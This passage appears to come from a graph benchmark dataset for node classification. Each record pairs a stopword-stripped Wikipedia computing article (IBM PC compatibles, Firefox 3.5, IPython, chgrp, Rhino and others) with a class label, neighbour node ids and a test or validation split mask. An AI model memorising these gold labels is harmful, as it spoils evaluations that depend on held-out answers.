ibm pc compatible 've yet one arrive ... alas lot stuff n't run eagle z-100 compupro anything else around columbia university reported january 1984 kermit ran without modification compaq columbia data products clones eagle seequa ms-dos computers also required custom code many companies reluctant products pc compatibility tested pc magazine requested samples computer manufacturers claimed produce compatibles april 1984 review 14 31 declined corona data systems specified systems run software conforms ibm pc programming standards popular software byte journalist asked test peachtext spring 1983 comdex corona representatives hemmed hawed bit finally led ... corner one would see fail magazine reported hesitancy unnecessary disk booted without problem zenith data systems bolder bragging z-150 ran applications people brought test 1984 west coast computer faire creative computing 1985 stated reiterate standard line regarding ibm pc compatibles try package want use buy computer companies modified computers bios work newly discovered incompatible applications reviewers users developed stress tests measure compatibility 1984 ability operate lotus 1-2-3 flight simulator became standard compatibles specifically designed run ibm believed companies eagle corona handwell infringed copyright apple computer inc. v. franklin computer corp. successfully forced clone makers stop using bios phoenix bios 1984 however similar products ami bios permitted computer makers legally build essentially 100 -compatible clones without reverse-engineer pc bios september 1985 infoworld chart listed seven compatibles 256 kb ram two disk drives monochrome monitors 1,495 2,320 equivalent ibm pc cost 2,820 1986 compute stated clones generally reliable 99 percent compatible february 1984 byte wrote ibm burgeoning influence pc community stifling innovation many companies mimicking big blue market grew ibm influence diminished november 1985 pc magazine stated created pc market market n't necessarily need ibm machines may depend ibm set standards develop higher-performance machines ibm better conform existing standards hurt users january 1987 bruce webster wrote byte rumors ibm would introduce proprietary personal computers proprietary operating system cares ibm likely isolate largest marketplace really ca n't compete anymore anyway magazine predicted 1987 market complete transition ibm standard intel/ms-dos/expansion bus standard ... folks n't much concerned ibm compatibility lotus 1-2-3 compatibility 1992 macworld stated clones ibm lost control market became minor player technology ibm announced os/2-oriented ps/2 line early 1987 sales existing dos-compatible pc compatibles rose part proprietary operating system available 1988 gartner group estimated public purchased 1.5 clones every ibm pc 1989 compaq influential industry executives spoke compaq compatible observers stating customers saw company ibm equal 1987 ibm pc compatibles dominated home business markets commodity computers notable alternative architectures used niche markets like macintosh computers offered apple inc. used mainly desktop publishing time aging 8-bit commodore 64 selling 150 time became world best-selling computer 32-bit commodore amiga line used television video production 32-bit atari st used music industry however ibm lost main role market ibm pc compatibles 1990 events retrospect important despite popularity thinkpad set laptop pc ibm finally relinquished role consumer pc manufacturer april 2005 sold laptop desktop pc divisions lenovo us 1.75 billion october 2007 hewlett-packard dell largest shares pc market north america also successful overseas acer lenovo toshiba also notable worldwide huge number pcs white box systems assembled myriad local systems builders despite advances computer technology current ibm pc compatibles remain much compatible original ibm pc computers although components implement compatibility special backward compatibility modes used system boot often practical run old software modern system using emulator rather relying features 2014 lenovo acquired ibm x86-based server business us 2.1 billion one strengths pc compatible design modular hardware design end-users could readily upgrade peripherals degree processor memory without modifying computer motherboard replacing whole computer case many microcomputers time however processor speed memory width increased limits original xt/at bus design soon reached particularly driving graphics video cards ibm introduce upgraded bus ibm ps/2 computer overcame many technical limits xt/at bus rarely used basis ibm compatible computers since required licence payments ibm ps/2 bus prior at-bus designs produced company seeking license unpopular hardware manufacturers several competing bus standards developed consortiums agreeable license terms various attempts standardize interfaces made practice many attempts either flawed ignored even many expansion options despite confusion users pc compatible design advanced much faster competing designs time even market dominance 1990s ibm influence pc architecture started decline ibm-brand pc became exception rather rule instead placing importance compatibility ibm pc vendors began emphasize compatibility windows 1993 version windows nt released could operate processors x86 set required applications recompiled developers hardware independence used silicon graphics sgi x86 workstations–thanks nt hardware abstraction layer hal could operate nt vast application library mass-market personal computer hardware vendor dared incompatible latest version windows microsoft annual winhec conferences provided setting microsoft could lobby for—and cases dictate—the pace direction hardware pc industry microsoft intel become important ongoing development pc hardware industry writers began using word wintel refer combined hardware-software system terminology becoming misnomer intel lost absolute control direction x86 hardware development amd amd64 also non-windows operating systems like macos linux established presence x86 architecture although ibm pc designed expandability designers could anticipate hardware developments 1980s size industry would engender make things worse ibm choice intel 8088 cpu introduced several limitations developing software pc compatible platform example 8088 processor 20-bit memory addressing space expand pc beyond one megabyte lotus intel microsoft jointly created expanded memory ems bank-switching scheme allow memory provided add-in hardware accessed set four 16-kilobyte windows inside 20-bit addressing later intel cpus larger address spaces could directly address 16- megabytes mibs 80286 causing microsoft develop extended memory xms require additional hardware expanded extended memory incompatible interfaces anyone writing software used one megabyte provide systems greatest compatibility ms-dos began including emm386 simulated ems memory using xms memory protected mode os also written 80286 dos application compatibility difficult expected dos applications accessed hardware directly bypassing bios routines intended ensure compatibility also bios requests made first 32 interrupt vectors marked reserved protected mode processor exceptions intel video cards suffered incompatibilities standard interface using higher-resolution svga graphics modes supported later video cards manufacturer developed methods accessing screen memory including different mode numberings different bank switching arrangements latter used address large images within single 64kb segment memory previously vga standard used planar video memory arrangements effect easily extend greater colour depths higher resolutions offered svga adapters attempt creating standard named vesa bios extensions vbe made manufacturers used 386 introduced protected mode os could written time dos compatibility much easier virtual 8086 mode unfortunately programs could switch directly eventually new memory-model apis developed vcpi dpmi latter becoming popular great number third-party adapters standard programming pc could difficult professional developers would operate large test-suite various known-to-be-popular hardware combinations meanwhile consumers overwhelmed competing incompatible standards many different combinations hardware offer give idea sort pc would need operate software multimedia pc mpc standard set 1990 pc met minimum mpc standard could marketed mpc logo giving consumers easy-to-understand specification look software could operate minimally mpc-compliant pc would guaranteed operate mpc mpc level 2 mpc level 3 standards set later term mpc compliant never became popular mpc level 3 1996 mpc standards established late 1990s success microsoft windows driven rival commercial operating systems near-extinction ensured “ ibm pc compatible ” computer dominant computing platform meant developer made software wintel platform would still able reach vast majority computer users late 1980s major competitor windows percentage points market share apple inc. macintosh mac started billed computer rest us mac high prices closed architecture meant dos/windows onslaught quickly drove macintosh education desktop publishing niche emerged mid-2000s mid-1990s mac market share dwindled around 5 introducing new rival operating system become risky commercial venture experience shown even operating system technically superior windows would failure market beos os/2 example 1989 steve jobs said new next system either last new hardware platform succeed first fail four years later 1993 next announced ending production nextcube porting nextstep intel processors early pc history companies introduced xt-compatible chipsets example chips technologies introduced 82c100 xt controller integrated replaced six original xt circuits one 8237 dma controller one 8253 interrupt timer one 8255 parallel interface controller one 8259 interrupt controller one 8284 clock generator one 8288 bus controller similar non-intel chipsets appeared at-compatibles example opti 82c206 82c495xlc found many 486 early pentium systems x86 chipset market volatile though 1993 vlsi technology become dominant market player virtually wiped intel year later intel uncontested leader ever since wintel platform gained dominance intel gradually abandoned practice licensing technologies chipset makers 2010 intel involved litigation related refusal license processor bus related technologies companies like nvidia companies amd cyrix developed alternative cpus functionally compatible intel towards end 1990s amd taking increasing share cpu market pcs amd even ended playing significant role directing development x86 platform athlon line processors continued develop classic x86 architecture intel deviated netburst architecture pentium 4 cpus ia-64 architecture itanium set server cpus amd developed amd64 first major extension created intel intel later adopted x86-64 2006 intel began abandoning netburst release set core processors represented development earlier pentium iii major alternative wintel domination rise alternative operating systems since early 2000s marked start post-pc era term ibm pc compatible commonly used presently current mainstream desktop laptop computers based pc architecture ibm longer makes pcs competing hardware architectures either discontinued like amiga relegated niche enthusiast markets past successful exception apple macintosh platform used non-intel processors inception although macintosh initially based motorola 68000 family transitioned powerpc architecture macintosh computers transitioned intel processors beginning 2006 today macintosh computers share system architecture wintel counterparts boot microsoft windows without dos compatibility card processor speed memory capacity modern pcs many orders magnitude greater original ibm pc yet backwards compatibility largely maintained 32-bit operating system still operate many simpler programs written os early 1980s without needing emulator though emulator like dosbox near-native functionality full speed additionally many modern pcs still run dos directly although special options usb legacy mode sata-to-pata emulation may need set bios setup utility computers using extensible firmware interface might need set legacy bios mode able boot dos however bios/efi options mass-produced consumer-grade computers limited configured truly handle oses original variants dos recent spread x86-64 architecture distanced current computers operating systems internal similarity original ibm pc introducing yet another processor mode instruction set modified 64-bit addressing x86-64 capable processors also retain standard x86 compatibility",
    "neighbors": [
      6148,
      6660,
      6150,
      10757,
      10768,
      532,
      533,
      7188,
      7190,
      8732,
      10273,
      4642,
      7715,
      548,
      1576,
      1071,
      9777,
      563,
      4150,
      7739,
      4674,
      6213,
      5702,
      10312,
      585,
      6730,
      5709,
      1617,
      7772,
      3166,
      8287,
      4705,
      10337,
      107,
      8301,
      2159,
      2161,
      7285,
      4727,
      10359,
      633,
      10360,
      10363,
      4220,
      1660,
      7806,
      639,
      8830,
      10369,
      10371,
      4228,
      4741,
      1162,
      7307,
      6797,
      7311,
      9363,
      4244,
      11411,
      4758,
      1176,
      11421,
      3230,
      2213,
      178,
      1202,
      6322,
      181,
      11447,
      11454,
      5312,
      8390,
      3272,
      9422,
      6352,
      8917,
      2266,
      1247,
      1248,
      226,
      5348,
      3304,
      6889,
      2282,
      3307,
      5356,
      8429,
      6895,
      8944,
      5873,
      8945,
      5368,
      2811,
      11008,
      5377,
      6913,
      9477,
      5384,
      780,
      9212,
      9998,
      8976,
      6419,
      5400,
      3867,
      8480,
      292,
      1324,
      7983,
      6453,
      823,
      2871,
      1849,
      4409,
      11068,
      10561,
      10051,
      3911,
      7495,
      9549,
      11603,
      4441,
      9563,
      8540,
      11100,
      9569,
      8561,
      7538,
      11634,
      3445,
      1400,
      11129,
      9597,
      5506,
      5000,
      10121,
      10635,
      400,
      913,
      5520,
      5523,
      10130,
      9627,
      5534,
      10658,
      8101,
      1958,
      6570,
      8625,
      9141,
      952,
      9658,
      10173,
      6078,
      9665,
      10692,
      7109,
      7622,
      8136,
      6090,
      9166,
      1501,
      2525,
      5598,
      7134,
      2530,
      5091,
      10728,
      1515,
      7151,
      6128,
      499,
      8180,
      8700,
      5629,
      1535
    ],
    "mask": "Test"
  },
  {
    "node_id": 6130,
    "label": 3,
    "text": "Macintosh_Quadra_610:macintosh quadra 610 macintosh quadra 610 originally called macintosh centris 610 personal computer designed manufactured sold apple computer february 1993 july 1994 centris 610 introduced alongside larger centris 650 replacement macintosh iisi intended start new midrange centris line computers later 1993 apple decided follow emerging industry trend naming product families target customers quadra business lc education performa home folded centris 610 quadra family 610 second macintosh case design macintosh lc family use pizza box form factor later used centris quadra 660av power macintosh 6100 quadra 610 also sold dos compatible model additional 486sx processor 25 mhz processor direct slot card server variant workgroup server 60 introduced july 1993 20 mhz processor received 25 mhz upgrade october dos compatible version introduced february 1994 way apple judge whether market would interested macintosh could also run dos product deemed apple success selling 25,000 units produced two months quadra 610 replaced quadra 630 july 1994 workgroup server 6150 replaced workgroup server 60 apple entry-level server offering standard equipment centris 610 models includes onboard video vga support via adapter two adb two serial ports external scsi connector two simm slots support 4 8 16 32 mb simms allowing 68 mb ram ethernet-capable models aaui port nubus slots optional expansion card offered plugs processor direct slot allows single 7-inch nubus card installed horizontal orientation arrangement initially precluded use full 68040 processor insufficient clearance heat sink something 68lc040 require longer issue time quadra 610 dos compatible released included full 68040 cpu centris 610 first introduced 7-inch nubus cards existed 12 inches smaller size part upcoming update nubus standard system 7.1 included standard mac os 8.1 highest supported version introduced february 10 1993 introduced july 26 1993 introduced october 21 1993 introduced february 28 1994",
    "neighbors": [
      7697,
      4114,
      6165,
      11289,
      7706,
      8222,
      1057,
      6183,
      1576,
      4139,
      7211,
      8253,
      1090,
      4180,
      10838,
      10840,
      3167,
      9312,
      8806,
      6258,
      10357,
      4220,
      10365,
      10878,
      6783,
      4741,
      7305,
      8842,
      6283,
      7824,
      147,
      7830,
      6807,
      4258,
      7842,
      7844,
      7869,
      8893,
      8896,
      4807,
      4810,
      1744,
      3293,
      9952,
      6884,
      6377,
      1772,
      1776,
      10481,
      1290,
      781,
      4879,
      784,
      10516,
      8480,
      10023,
      4910,
      7983,
      11066,
      9022,
      10562,
      8525,
      2388,
      8534,
      3928,
      8540,
      6495,
      8544,
      11629,
      10608,
      9084,
      7549,
      11649,
      3977,
      6539,
      1428,
      3483,
      2979,
      9641,
      8109,
      446,
      5058,
      10691,
      1482,
      6608,
      8662,
      9174,
      9686,
      8665,
      10199,
      9182,
      2023,
      5616,
      2551,
      2553,
      8700,
      1534
    ],
    "mask": "None"
  },
  {
    "node_id": 6131,
    "label": 1,
    "text": "Spatiotemporal_database:spatiotemporal database spatiotemporal database database manages space time information common examples include spatiotemporal databases extension spatial databases spatiotemporal database embodies spatial temporal spatiotemporal database concepts captures spatial temporal aspects data deals although exist numerous relational databases spatial extensions spatiotemporal databases based relational model practical reasons chiefly among data multi-dimensional capturing complex structures behaviours 2008 rdbms products spatiotemporal extensions products open-source terralib use middleware approach storing data relational database unlike pure spatial domain however official de facto standards spatio-temporal data models querying general theory area also less well-developed another approach constraint database system mlpq management linear programming queries geomesa open-source distributed spatiotemporal index built top bigtable-style databases using implementation z-order_curve create multi-dimensional index combining space time",
    "neighbors": [
      2818,
      9893,
      9286,
      3880,
      1161,
      522,
      7816,
      2512,
      11474,
      2612,
      2901,
      8085,
      8122
    ],
    "mask": "Test"
  },
  {
    "node_id": 6132,
    "label": 9,
    "text": "GameMonkey_Script:gamemonkey script gamemonkey script small cross-platform scripting language designed embedding games gamemonkey bears many similarities lua except syntax similar c. gamemonkey script written 2002 matthew riek greg douglas part closed-source project auran development however 12 june 2003 auran granted license full source code gamemonkey released public mit license currently used commercial hobby applications wide range machines windows pc apple mac microsoft xbox sony playstation 2 playstation 3 nintendo gamecube nintendo ds nintendo wii various distributions linux like lua primary data structure gamemonkey script table tables allow variety data structures created arrays sets hashmaps lists records also used simulate namespaces c++ class structures containing functions properties",
    "neighbors": [
      2304,
      4777,
      5612,
      9780,
      2045
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6133,
    "label": 5,
    "text": "Firefox_3.5:firefox 3.5 mozilla firefox 3.5 version firefox web browser released june 2009 adding variety new features firefox version 3.5 touted twice fast 3.0 due tracemonkey javascript engine rendering improvements includes private browsing tear-off tabs uses gecko 1.9.1 engine codenamed shiretoko development initially numbered firefox 3.1 mozilla developers decided change version 3.5 reflect inclusion significantly greater scope changes originally planned last major version support x bitmap images estimates firefox 3.5 global market share february 2010 around 15–20 rose rapidly july 2009 users migrated firefox 3.0 january 2010 began decline users migrated firefox 3.6 mid-december 2009 february 2010 firefox 3.5 popular browser counting individual browser versions according statcounter one top 3 browser versions according net applications milestones involved passing internet explorer 7 previously held 1 3 spots popularity according statcounter net applications respectively due january 2010 well-publicized vulnerability microsoft internet explorer browser german french australian governments publicly issued warnings internet explorer users use alternative browsers least fix security hole made first browser recommended mozilla firefox followed google chrome even release firefox 3.0 june 17 2008 firefox 3.1 development codename shiretoko planned include new interface features tab previews tag auto-completion html 5 video tag support css text shadows first alpha released july 28 2008 new tab switching behavior implemented switches recently used tab instead adjacent one switching thumbnails displayed user preview tabs switching awesome bar also improved filtering bookmarks history gecko engine updated include css3 features includes html canvas text api alpha release showed 18 improvement acid3 test firefox 3.0 scoring 84/100 version 3.1 alpha 2 launched september 5 2008 implementing html 5 video element support preliminary support web worker thread enhancing speed javascript computations october 14 2008 first beta firefox 3.1 released included new tracemonkey javascript engine enabled default implementation w3c geolocation api beta 2 released december 8 2008 included new private browsing feature new tab switching behavior interface dropped beta since developer found needed work firefox 3.1 beta 3 released march 12 2009 followed beta 4 first labeled version 3.5 april 27 2009 june 8 2009 mozilla released firefox 3.5 preview labeled 3.5b99 order receive additional testing became release candidate release candidate 1 released update firefox 3.5 preview users june 17 2009 released candidate 2 made widely available june 19 2009 followed third rc june 24 2009 firefox 3.5 officially released june 30 2009 firefox 3.5 uses gecko 1.9.1 engine adds features included 3.0 release include support codice_1 codice_2 elements defined html 5 draft specification including native support ogg theora encoded video vorbis encoded audio goal offer video audio playback without encumbered patent issues associated plugin codec technologies features new firefox 3.5 include private browsing mode native support json web worker threads many new web technologies multi-touch support also added release including gesture support like pinching zooming swiping back forward firefox 3.5 also features updated logo previous releases minor change version 3.5 default search engine russian language builds uses search engine yandex rather google survey russian firefox users indicated preferred yandex first update 3.5.1 released july 16 2009 solved vulnerabilities detected final release another update 3.5.2 released august 3 2009 followed version 3.5.3 september 9 2009 version 3.5.4 october 27 2009 version 3.5.5 november 5 2009 version 3.5.6 december 15 2009 version 3.5.7 january 5 2010 starting july 14 2009 upgrade 3.5 offered users firefox 3.0 automatic internal push update mechanism security stability updates firefox 3.5.x scheduled end august 2010 however firefox 3.5.12 released september 7 2010 mozilla continued shipping incremental stability security fixes build 3.5.19 released april 28 2011 release firefox 3.6.18 mozilla issued update move remaining firefox 3.5 users new browser finally ending support 3.5",
    "neighbors": [
      6657,
      9736,
      2579,
      6171,
      9757,
      7713,
      3110,
      10791,
      9768,
      9770,
      559,
      2095,
      4661,
      3639,
      9275,
      64,
      9281,
      5707,
      10834,
      6231,
      8281,
      6747,
      11363,
      1642,
      9834,
      10860,
      115,
      9843,
      3191,
      119,
      4728,
      637,
      1664,
      6791,
      6797,
      11418,
      10910,
      8351,
      7340,
      1713,
      9908,
      7861,
      185,
      11449,
      4797,
      7364,
      11466,
      7885,
      7889,
      4310,
      2777,
      8923,
      737,
      4326,
      4331,
      4844,
      8443,
      7943,
      1295,
      1807,
      7951,
      2836,
      3350,
      10006,
      7965,
      1834,
      7983,
      823,
      10057,
      10060,
      2893,
      10078,
      11112,
      8557,
      7543,
      3961,
      6528,
      3971,
      3462,
      8584,
      6028,
      7572,
      5026,
      5054,
      10174,
      9152,
      4048,
      5078,
      482,
      10722,
      5605,
      487,
      8169,
      5612,
      494,
      1520,
      7152,
      5114,
      6143
    ],
    "mask": "None"
  },
  {
    "node_id": 6134,
    "label": 2,
    "text": "IPython:ipython ipython interactive python command shell interactive computing multiple programming languages originally developed python programming language offers introspection rich media shell syntax tab completion history ipython provides following features ipython based architecture provides parallel distributed computing ipython enables parallel applications developed executed debugged monitored interactively hence interactive ipython architecture abstracts parallelism enabling ipython support many different styles parallelism including release ipython 4.0 parallel computing capabilities made optional released ipyparallel python package ipython frequently draws scipy stack libraries like numpy scipy often installed alongside one many scientific python distributions ipython provides integration libraries scipy stack notably matplotlib producing inline graphs used jupyter notebook python libraries implement ipython specific hooks customize rich object display sympy example implements rendering mathematical expressions rendered latex used within ipython context ipython allows non-blocking interaction tkinter pygtk pyqt/pyside wxpython standard python shell allows interaction tkinter ipython interactively manage parallel computing clusters using asynchronous status callbacks and/or mpi ipython also used system shell replacement default behavior largely similar unix shells allows customization flexibility executing code live python environment using ipython shell replacement less common recommended use xonsh provide ipython feature better shell integrations ipython 5.x long time support series last version ipython support python 2 ipython project pledged support python 2 beyond 2020 one first projects join python 3 statement 6.x series compatible python 3 still possible though run ipython kernel jupyter notebook server different python versions allowing user still access python 2 newer version jupyter 2014 fernando pérez announced spin-off project ipython called project jupyter ipython continued exist python shell kernel jupyter notebook interface language-agnostic parts ipython moved jupyter name jupyter language agnostic name reference core programming languages supported jupyter julia python r. jupyter notebook formerly ipython notebooks web-based interactive computational environment creating executing visualizing jupyter notebooks similar notebook interface programs maple mathematica sagemath computational interface style originated mathematica 1980s supports execution environments aka kernels dozens languages default jupyter notebook ships ipython kernel 100 jupyter kernels may 2018 ipython mentioned popular computing press popular media presence scientific conferences scientific engineering work often presented companion tool matplotlib beginning 1 january 2013 alfred p. sloan foundation announced would support ipython development two years 23 march 2013 fernando perez awarded free software foundation advancement free software award ipython august 2013 microsoft made donation 100,000 sponsor ipython ’ continued development january 2014 jolt productivity award dr. dobb category coding tools july 2015 project funding 6 million gordon betty moore foundation alfred p. sloan foundation leona m. harry b. helmsley charitable trust may 2018 awarded 2017 acm software system award largest team award",
    "neighbors": [
      7684,
      2181,
      3462,
      4840,
      5833,
      8554,
      5612,
      462,
      7983,
      6993,
      11442,
      10771,
      11221,
      8923,
      7325,
      6718
    ],
    "mask": "Test"
  },
  {
    "node_id": 6135,
    "label": 0,
    "text": "ELAN_software:elan software elan computer software professional tool manually semi-automatically annotate transcribe audio video recordings tier-based data model supports multi-level multi-participant annotation time-based media applied humanities social sciences research language documentation sign language gesture research purpose documentation qualitative quantitative analysis distributed free open source software gnu general public license version 3 elan well established professional-grade software widely used academia well received several academic disciplines example psychology medicine psychiatry education behavioral studies topics human computer interaction sign language conversation analysis group interactions music therapy bilingualism child language acquisition analysis non-verbal communication gesture analysis animal behavior several third-party tools developed enrich analyse elan data corpora features include elan developed max planck institute psycholinguistics nijmegen first version released around year 2000 name eat eudico annotation tool renamed elan 2002 since two three new versions released year developed programming language java interfaces platform native media frameworks developed c c++ objective-c",
    "neighbors": [
      5380,
      10470,
      5356,
      5677,
      6797,
      7983,
      5075,
      823,
      2045,
      479
    ],
    "mask": "Test"
  },
  {
    "node_id": 6136,
    "label": 4,
    "text": "Ralph_Canine:ralph canine ralph julian canine november 9 1895 – march 8 1969 lieutenant general united states army first director national security agency canine born 1895 flora indiana one two children local superintendent schools left home intent doctor completed pre-med studies northwestern university entered united states army world war commissioned second lieutenant canine served various combat posts france world war elected stay army armistice signed 1918 interwar period education traveled one army post another filling job vacant world war ii broke canine well fitted responsibility became chief staff xii corps served general george patton third army race across france 1944 war rewarded command 1st infantry division 1951 canine became director armed forces security agency america first tentative step toward cryptologic unification long enough one year see organization lacked president harry s. truman created national security agency 1952 canine continued first director died unexpectedly pulmonary embolism march 1969",
    "neighbors": [
      6017,
      8726,
      1189,
      6572,
      9517,
      1838,
      5308,
      1986,
      6343,
      6344,
      11335,
      7119,
      7759,
      7887,
      3154,
      8276,
      7893,
      991,
      7137,
      3305,
      7145,
      2419,
      6005,
      766
    ],
    "mask": "None"
  },
  {
    "node_id": 6137,
    "label": 9,
    "text": "Praspel:praspel praspel php realistic annotation specification language formal specification language php based design-by-contract paradigm uses preconditions postconditions invariants etc specifications written comments php code always accessible praspel used manual automatic software validation verification thanks realistic domains",
    "neighbors": [
      9345,
      8644,
      8262,
      9320,
      11625,
      7983
    ],
    "mask": "Test"
  },
  {
    "node_id": 6138,
    "label": 2,
    "text": "Chgrp:chgrp chgrp change group command may used unprivileged users unix-like systems change group associated file system object file directory link one member file system object 3 sets access permissions one set owner one set group one set others changing group object could used change users write file codice_1 chgrp name_of_group_to_change file_name -r recurse subdirectories -v verbosely output names objects changed useful fso list -f force forge ahead objects even error encountered command changes group associated file prog.conf wheel staff provided executing user member group could used allow members staff modify configuration programs prog prox",
    "neighbors": [
      515,
      9733,
      9735,
      3976,
      521,
      5256,
      6281,
      6664,
      4750,
      8975,
      11663,
      4369,
      5397,
      2198,
      6812,
      7196,
      4001,
      2599,
      7847,
      8236,
      4398,
      7983,
      1336,
      8504,
      7356,
      451,
      1987,
      965,
      2245,
      8517,
      9542,
      5706,
      3659,
      8522,
      1741,
      10967,
      9946,
      6369,
      8675,
      10727,
      6120,
      491,
      8954,
      11249,
      4850,
      5106,
      5492,
      8306,
      8692,
      9204,
      10484,
      506,
      5759
    ],
    "mask": "Test"
  },
  {
    "node_id": 6139,
    "label": 3,
    "text": "Deferred_Procedure_Call:deferred procedure call deferred procedure call dpc microsoft windows operating system mechanism allows high-priority tasks e.g interrupt handler defer required lower-priority tasks later execution permits device drivers low-level event consumers perform high-priority part processing quickly schedule non-critical additional processing execution lower priority dpcs implemented dpc objects created initialized kernel device driver kernel mode program issues requests dpc dpc request added end dpc queue processor separate dpc queue dpcs three priority levels low medium high default dpcs set medium priority windows drops irql dispatch/dpc level checks dpc queue pending dpcs executes queue empty interrupt higher irql occurs example clock interrupt generated clock interrupt handler generally increments counter current thread calculate total execution time thread decrements quantum time remaining 1 counter drops zero thread scheduler invoked choose next thread executed processor dispatcher perform context switch since clock interrupt occurs much higher irql desirable perform thread dispatching less critical task later time processor irql drops clock interrupt handler requests dpc object adds end dpc queue process dispatching processor irql drops dpc/dispatch level working streaming audio video uses interrupts dpcs used process audio buffer stream another dpc poorly written driver takes long another interrupt generates new buffer data first one processed drop-out results",
    "neighbors": [
      6797,
      5823
    ],
    "mask": "None"
  },
  {
    "node_id": 6140,
    "label": 5,
    "text": "Harvest_project:harvest project harvest darpa funded research project internet research task force research group resource discovery ietf-rd hosted university colorado boulder provided web cache developed standards internet cache protocol summary object interchange format spawned many technologies software products conclusion project 1996 development harvest object cache continued university edinburgh releasing version 1.5 open source squid cache commercial netcache based harvest object cache",
    "neighbors": [
      6569,
      6894,
      119
    ],
    "mask": "Test"
  },
  {
    "node_id": 6141,
    "label": 4,
    "text": "Security_hologram:security hologram security holograms labels hologram printed onto sale security reasons holograms security labels difficult forge replicated master hologram requires expensive specialized technologically advanced equipment used widely several banknotes around world particular high denominations also used passports credit bank cards well quality products herman lopata president new york-based automatic toll systems inc. received patent 1987 credit card security hologram part early work high speed highway toll collection—the predecessor modern ez pass type equipment holograms classified different types reference degree level optical security incorporated process master origination different classifications described far common type hologram – fact holograms true sense words term hologram taken secondary meaning due widespread use multilayer image credit cards driver licenses type hologram consists two images stacked way alternately visible depending upon angle perspective viewer technology similar technology used past 50 years make red safety night reflectors bicycles trucks cars holograms therefore artwork holograms may two layers i.e background foreground three layers background middle ground foreground case two-layer holograms matter middle ground usually superimposed matter background hologram holograms display unique multilevel multi-colour effect images one two levels flat graphics “ floating ” surface hologram matter background appears behind hologram giving illusion depth holograms maximum resolution 10 micrometres per optical element produced specialized machines making forgery difficult expensive design optical elements several algorithms used shape scattered radiation patterns flip-flop hologram master origination technique used produce holograms display flip-flop effect produced used 2d/3d master shooting system two channel effect 2d/3d holograms displays two different images different angles holograms often fabricated using supreme quality material final master obtained flip-flop mastering technique used manufacture holograms gives flip-flop effects excellent blend 2d/3d flipping images offers holographic images excellent depth dazzling appeal types hologram created using highly sophisticated expensive electron-beam lithography systems kind technology allows creation surface holograms resolution 0.1 micrometres 254,000 dpi technique requires development various algorithms designing optical elements shapes scattered radiation patterns type hologram offers features like viewing four lasers single point 2d/3d raster text switch effects 3d effects concealed images laser readable text true colour images various kinds features possible security holograms mentioned usually take form thin lines contours concealed images seen large angle light diffraction one particular angle sets thin lines complicated geometry guilloché patterns drawn high resolution technology allows continuous visual changes colour along separated lines seen conditions hologram observations changed turning inclining hologram allows movements certain features image studied dot matrix holograms capable embedding microtext various sizes three types microtexts holograms high contrast microtexts size 50 – 150 micrometres diffractive grating filled microtexts size 50 – 150 micrometres low contrast microtexts microtexts sizes smaller 50 micrometres referred nanotext nanotext sizes less 50 micrometres observed microscope dot matrix holograms also support covert laser readable clr imagery simple laser device may used verify hologram authenticity computing clr images complicated mathematical task involves solving ill-posed problems two types clr dynamic clr multigrade clr dynamic clr set clr fragments produce animated images screen control device moves along hologram surface multigrade clr images produce certain images screen controlling device differ first minus first orders laser light diffraction variant hidden image negative positive plus one minus one order respectively may created recently novel computer-generated holograms proposed working structured light carrying phase singularities optical elements improve security level since encoded information appears input illumination endowed correct intensity phase distribution technology allows 2d 3d images combined security features microtexts concealed images clr etc combination effect achieved using traditional technologies origination 2d/3d hologram masters developed 2d/3d master shooting lab incorporates highly sensitive machines advanced equipment microprocessor-controlled automatic positioning equipment optical table he-cd laser laser power controller silver coatings related technologies final master obtained 2d/3d mastering used manufacture 2d/3d hologram stickers stickers consist multitude two-dimensional layers images placed one behind thereby offering excellent depth stickers colorful images 3d depth different layers true colour images effective decorative pictures synthesized computer may include microtexts hidden images security features yielding attractive high-security holograms true color hologram masters produced using 2d/3d master shooting system final master obtained mastering technique comprises true photographic images like images people animals flags etc type holograms ’ duplicated case ’ obtain original photo true color holograms one best ways prevent counterfeiters duplicating",
    "neighbors": [
      5433,
      10163,
      1845,
      1087
    ],
    "mask": "Test"
  },
  {
    "node_id": 6142,
    "label": 9,
    "text": "Java_compiler:java compiler java compiler compiler programming language java common form output java compiler java class files containing platform-neutral java bytecode also compilers output optimized native machine code particular hardware/operating system combination java-to-bytecode compilers jikes well known exception virtually optimization leaving run time done jre java virtual machine jvm loads class files either interprets bytecode just-in-time compiles machine code possibly optimizes using dynamic compilation standard interact java compilers programmatically specified jsr 199 2019 following major java compilers",
    "neighbors": [
      1952,
      4960,
      8609,
      9665,
      5677,
      7983,
      5872,
      9714,
      2808,
      7421
    ],
    "mask": "Validation"
  },
  {
    "node_id": 6143,
    "label": 9,
    "text": "Rhino_(JavaScript_engine):rhino javascript engine rhino javascript engine written fully java managed mozilla foundation open source software separate spidermonkey engine also developed mozilla written c++ used mozilla firefox rhino project started netscape 1997 time netscape planning produce version netscape navigator written fully java needed implementation javascript written java netscape stopped work javagator called rhino project finished javascript engine since couple major companies including sun microsystems licensed rhino use products paid netscape allowing work continue originally rhino compiled javascript code java bytecode generated java class files produced best performance often beating c++ implementation javascript run just-in-time compilation jit suffered two faults first compiling time long since generating bytecode loading generated classes resource-intensive process also implementation effectively leaked memory since java virtual machines jvm n't collect unused classes strings interned result loading class file changed later versions java result fall 1998 rhino added interpretive mode classfile generation code moved optional dynamically loaded package compiling faster scripts longer use collected like java object rhino released mozilla foundation april 1998 originally rhino classfile generation held back release however licensors rhino agreed release rhino open source including class file generation since release open source rhino found variety uses increasing number people contributed code project gets name animal cover javascript book o'reilly media version 1.7r11 rhino supports java 8 supports number ecmascript es6/es2015 features rhino converts javascript scripts classes rhino works compiled interpreted mode intended used desktop server-side applications hence built-in support web browser objects commonly associated javascript rhino used debugger using rhino shell javascript shell provides simple way run scripts batch mode within interactive environment exploratory programming used applications embedding rhino slightly modified version rhino 1.6r2 comes bundled sun microsystems release java se version 6 released december 2006 makes easier integrate javascript part java programs access java resources javascript implementations java 6 may differ",
    "neighbors": [
      7176,
      9736,
      9757,
      5677,
      572,
      9281,
      7750,
      4171,
      84,
      6231,
      2138,
      603,
      2658,
      5219,
      10860,
      4728,
      3705,
      8825,
      637,
      1664,
      3712,
      6791,
      8854,
      11418,
      1713,
      3761,
      7861,
      11449,
      5311,
      7871,
      6860,
      7889,
      4822,
      220,
      1250,
      7396,
      10991,
      5872,
      8443,
      2304,
      259,
      4358,
      10507,
      1295,
      7951,
      2836,
      10006,
      4378,
      10526,
      7455,
      803,
      7983,
      9011,
      11060,
      7485,
      2880,
      10057,
      2893,
      11087,
      3920,
      339,
      1363,
      9560,
      10078,
      4960,
      5987,
